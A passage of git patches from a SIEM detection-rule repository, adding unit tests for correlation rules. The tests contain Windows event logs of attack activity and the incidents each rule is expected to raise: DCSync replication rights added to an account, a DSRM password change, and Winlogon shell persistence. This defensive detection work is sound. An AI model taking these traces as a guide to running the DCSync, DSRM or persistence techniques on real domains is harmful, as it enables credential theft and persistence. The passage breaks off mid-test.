"event_src.subsys": "Security", "event_src.title": "active_directory", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_5136_A_directory_service_object_was_modified", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "5136", "normalized": true, "object": "ds_object", "object.id": "{c6faf700-bfe4-452a-a766-424f84c29583}", "object.name": "DC=insecurebank,DC=local", "object.property": "nTSecurityDescriptor", "object.state": "value added", "object.type": "domainDNS", "object.value": "O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-08T15:53:16.903Z", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "S-1-5-21-738609754-2819869699-4189121830-1108", "subject.account.name": "bob", "subject.account.session_id": "68101913", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-03-25T21:28:45.022Z", "type": "raw", "uuid": "51381f34-7783-4419-8100-ce0b38165f5d"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "category.generic": "Attack", "category.high": "Persistence", "category.low": "Account Manipulation", "correlation_name": "DCSync_prepare_Add_replicatation_rights_to_Account", "correlation_type": "incident", "event_src.category": "Directory service", "event_src.fqdn": "dc1.insecurebank.local", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "event_src.subsys": "Security", "event_src.title": "active_directory", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "DCSync_prepare_Add_replicatation_rights_to_Account|dc1.insecurebank.local|s-1-5-21-738609754-2819869699-4189121830-1108", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "ds_object", "object.id": "{c6faf700-bfe4-452a-a766-424f84c29583}", "object.name": "DC=insecurebank,DC=local", "object.property": "nTSecurityDescriptor", "object.state": "value added", "object.type": "domainDNS", "object.value": "O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "S-1-5-21-738609754-2819869699-4189121830-1108", "subject.account.name": "bob", "subject.account.session_id": "68101913"} \ No newline at end of file From d3bded798f4b64fc2d13326cc092b499b045c156 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Tue, 1 Aug 2023 12:20:57 +0300 Subject: [PATCH 44/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82,=20=D1=80=D0=B0=D1=81=D1=88?= =?UTF-8?q?=D0=B8=D1=80=D0=B8=D0=BB=20=D0=BF=D0=BE=D0=BB=D1=8F=20=D0=B4?= =?UTF-8?q?=D0=B0=D0=BD=D0=BD=D1=8B=D1=85=20=D0=BA=D0=BE=D1=82=D0=BE=D1=80?= =?UTF-8?q?=D1=8B=D0=B5=20=D0=BC=D1=8B=20=D0=BE=D0=B6=D0=B8=D0=B4=D0=B0?= =?UTF-8?q?=D0=B5=D0=BC=20=D0=B4=D0=BB=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2?= =?UTF-8?q?=D0=B8=D0=BB=D0=B0=20(DSRM=5FPassword=5FChanged)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../mitre_attck_persist/DSRM_Password_Changed/tests/test_1.sc | 2 +- .../mitre_attck_persist/DSRM_Password_Changed/tests/test_2.sc | 4 ++++ 2 files changed, 5 insertions(+), 1 deletion(-) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_persist/DSRM_Password_Changed/tests/test_2.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/DSRM_Password_Changed/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/DSRM_Password_Changed/tests/test_1.sc index 54627d09..5e9a8b6f 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_persist/DSRM_Password_Changed/tests/test_1.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/DSRM_Password_Changed/tests/test_1.sc @@ -1,3 +1,3 @@ {"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4794\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"13824\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2017-06-09T19:21:26.9686699Z\"},\"EventRecordID\":\"3139859\",\"Correlation\":{\"ActivityID\":\"{3b48c871-dfe6-0000-a5c8-483be6dfd201}\"},\"Execution\":{\"ProcessID\":\"792\",\"ThreadID\":\"1648\"},\"Channel\":\"Security\",\"Computer\":\"2016dc.hqcorp.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-1913345275-1711810662-261465553-500\"},{\"Name\":\"SubjectUserName\",\"text\":\"administrator\"},{\"Name\":\"SubjectDomainName\",\"text\":\"HQCORP\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x2f336f\"},{\"Name\":\"Workstation\",\"text\":\"2016DC\"},{\"Name\":\"Status\",\"text\":\"0x0\"}]}}}", "category.generic": "Account", "category.high": "Users And Rights Management", "category.low": "Manipulation", "datafield1": "3093359", "event_src.category": "Directory service", "event_src.fqdn": "2016dc.hqcorp.local", "event_src.host": "2016dc.hqcorp.local", "event_src.hostname": "2016dc", "event_src.subsys": "Security", "event_src.title": "active_directory", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4794_Attempt_was_made_to_set_DSRM_admin_password", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4794", "normalized": true, "object": "account", "object.property": "password", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-11T06:51:49.598Z", "src.host": "2016dc", "src.hostname": "2016dc", "status": "success", "subject": "account", "subject.account.domain": "hqcorp", "subject.account.id": "S-1-5-21-1913345275-1711810662-261465553-500", "subject.account.name": "administrator", "subject.account.session_id": "3093359", "subject.domain": "hqcorp", "subject.id": "S-1-5-21-1913345275-1711810662-261465553-500", "subject.name": "administrator", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2017-06-09T19:21:26.968Z", "type": "raw", "uuid": "052d4865-5e2e-4fa9-9f7d-b44fe3463697"} -expect 1 {"correlation_name": "DSRM_Password_Changed"} +expect 1 {"action": "modify", "category.generic": "Attack", "category.high": "Persistence", "category.low": "Account Manipulation", "correlation_name": "DSRM_Password_Changed", "correlation_type": "incident", "event_src.fqdn": "2016dc.hqcorp.local", "event_src.host": "2016dc.hqcorp.local", "event_src.hostname": "2016dc", "event_src.subsys": "Security", "event_src.title": "active_directory", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "DSRM_Password_Changed|2016dc.hqcorp.local|s-1-5-21-1913345275-1711810662-261465553-500", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "configuration", "object.property": "password", "src.host": "2016dc", "src.hostname": "2016dc", "status": "success", "subject": "account", "subject.account.domain": "hqcorp", "subject.account.id": "S-1-5-21-1913345275-1711810662-261465553-500", "subject.account.name": "administrator", "subject.account.session_id": "3093359"} \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/DSRM_Password_Changed/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/DSRM_Password_Changed/tests/test_2.sc new file mode 100644 index 00000000..b7819ba2 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/DSRM_Password_Changed/tests/test_2.sc @@ -0,0 +1,4 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4794\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"13824\",\"Opcode\":\"0\",\"Keywords\":\"0x8010000000000000\",\"TimeCreated\":{\"SystemTime\":\"2017-06-09T19:21:26.9686699Z\"},\"EventRecordID\":\"3139859\",\"Correlation\":{\"ActivityID\":\"{3b48c871-dfe6-0000-a5c8-483be6dfd201}\"},\"Execution\":{\"ProcessID\":\"792\",\"ThreadID\":\"1648\"},\"Channel\":\"Security\",\"Computer\":\"2016dc.hqcorp.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-1913345275-1711810662-261465553-500\"},{\"Name\":\"SubjectUserName\",\"text\":\"administrator\"},{\"Name\":\"SubjectDomainName\",\"text\":\"HQCORP\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x2f336f\"},{\"Name\":\"Workstation\",\"text\":\"2016DC\"},{\"Name\":\"Status\",\"text\":\"0x0\"}]}}}", "category.generic": "Account", "category.high": "Users And Rights Management", "category.low": "Manipulation", "datafield1": "3093359", "event_src.category": "Directory service", "event_src.fqdn": "2016dc.hqcorp.local", "event_src.host": "2016dc.hqcorp.local", "event_src.hostname": "2016dc", "event_src.subsys": "Security", "event_src.title": "active_directory", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4794_Attempt_was_made_to_set_DSRM_admin_password", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4794", "normalized": true, "object": "account", "object.property": "password", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-11T06:51:49.598Z", "src.host": "2016dc", "src.hostname": "2016dc", "status": "failure", "subject": "account", "subject.account.domain": "hqcorp", "subject.account.id": "S-1-5-21-1913345275-1711810662-261465553-500", "subject.account.name": "administrator", "subject.account.session_id": "3093359", "subject.domain": "hqcorp", "subject.id": "S-1-5-21-1913345275-1711810662-261465553-500", "subject.name": "administrator", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2017-06-09T19:21:26.968Z", "type": "raw", "uuid": "052d4865-5e2e-4fa9-9f7d-b44fe3463697"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "category.generic": "Attack", "category.high": "Persistence", "category.low": "Account Manipulation", "correlation_name": "DSRM_Password_Changed", "correlation_type": "incident", "event_src.fqdn": "2016dc.hqcorp.local", "event_src.host": "2016dc.hqcorp.local", "event_src.hostname": "2016dc", "event_src.subsys": "Security", "event_src.title": "active_directory", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "DSRM_Password_Changed|2016dc.hqcorp.local|s-1-5-21-1913345275-1711810662-261465553-500", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "high", "object": "configuration", "object.property": "password", "src.host": "2016dc", "src.hostname": "2016dc", "status": "failure", "subject": "account", "subject.account.domain": "hqcorp", "subject.account.id": "S-1-5-21-1913345275-1711810662-261465553-500", "subject.account.name": "administrator", "subject.account.session_id": "3093359"} From 233a21f833fc981f4d20da459dc44f2641b58392 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Tue, 1 Aug 2023 12:26:28 +0300 Subject: [PATCH 45/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Use=5Fpe?= =?UTF-8?q?rsist=5FStart=5Fprocess=5Fvia=5FWinlogonShell)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../tests/test_1.sc | 4 ++++ .../tests/test_2.sc | 4 ++++ 2 files changed, 8 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_persist/Use_persist_Start_process_via_WinlogonShell/tests/test_1.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_persist/Use_persist_Start_process_via_WinlogonShell/tests/test_2.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/Use_persist_Start_process_via_WinlogonShell/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Use_persist_Start_process_via_WinlogonShell/tests/test_1.sc new file mode 100644 index 00000000..61a4a2ab --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Use_persist_Start_process_via_WinlogonShell/tests/test_1.sc @@ -0,0 +1,4 @@ +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-06-14T22:23:13.9571207Z\"},\"EventRecordID\":\"7556\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1960\",\"ThreadID\":\"288\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-06-14 22:23:13.925\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-1e51-5d04-0000-00107b380c00}\"},{\"Name\":\"ProcessId\",\"text\":\"3444\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Roaming\\\\9QxTsAU9w8gyPj4w\\\\BRE6BgE2JubB.exe\"},{\"Name\":\"FileVersion\",\"text\":\"1.0.0.0\"},{\"Name\":\"Description\",\"text\":\"NpmTaskRunner\"},{\"Name\":\"Product\",\"text\":\"NpmTaskRunner\"},{\"Name\":\"Company\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Roaming\\\\9QxTsAU9w8gyPj4w\\\\BRE6BgE2JubB.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"IEWIN7\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{365abb72-1e4a-5d04-0000-002013c00b00}\"},{\"Name\":\"LogonId\",\"text\":\"0xbc013\"},{\"Name\":\"TerminalSessionId\",\"text\":\"2\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=E2286C233467D0E164ED5ED1D07BAC9F90F74D19,MD5=41CE32C0D1D4E5BB8C63674F317450EF,SHA256=5DE788D23B247B29F116CD0583280CE10A429E9F8C1D80C42DEAB20C6F4DBB4E,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{365abb72-1e51-5d04-0000-00104c340c00}\"},{\"Name\":\"ParentProcessId\",\"text\":\"3448\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\userinit.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\userinit.exe\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "365abb72-1e4a-5d04-0000-002013c00b00", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "770067", "object.process.cmdline": "\"C:\\Users\\IEUser\\AppData\\Roaming\\9QxTsAU9w8gyPj4w\\BRE6BgE2JubB.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\users\\ieuser\\appdata\\roaming\\9qxtsau9w8gypj4w\\bre6bge2jubb.exe", "object.process.guid": "365abb72-1e51-5d04-0000-00107b380c00", "object.process.hash.imphash": "F34D5F2D4577ED6D9CEEC516C1F5A744", "object.process.hash.md5": "41CE32C0D1D4E5BB8C63674F317450EF", "object.process.hash.sha1": "E2286C233467D0E164ED5ED1D07BAC9F90F74D19", "object.process.hash.sha256": "5DE788D23B247B29F116CD0583280CE10A429E9F8C1D80C42DEAB20C6F4DBB4E", "object.process.id": "3444", "object.process.meta": "Description:NpmTaskRunner | Product:NpmTaskRunner | Company:", "object.process.name": "bre6bge2jubb.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\userinit.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\userinit.exe", "object.process.parent.guid": "365abb72-1e51-5d04-0000-00104c340c00", "object.process.parent.id": "3448", "object.process.parent.name": "userinit.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\users\\ieuser\\appdata\\roaming\\9qxtsau9w8gypj4w\\", "object.process.version": "1.0.0.0", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T13:21:52.432Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "770067", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-06-14T22:23:13.925Z", "type": "raw", "uuid": "fa1f6a22-a663-4e1c-aef9-e09d7c0168ce"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "start", "category.generic": "Persistence", "category.high": "Boot or 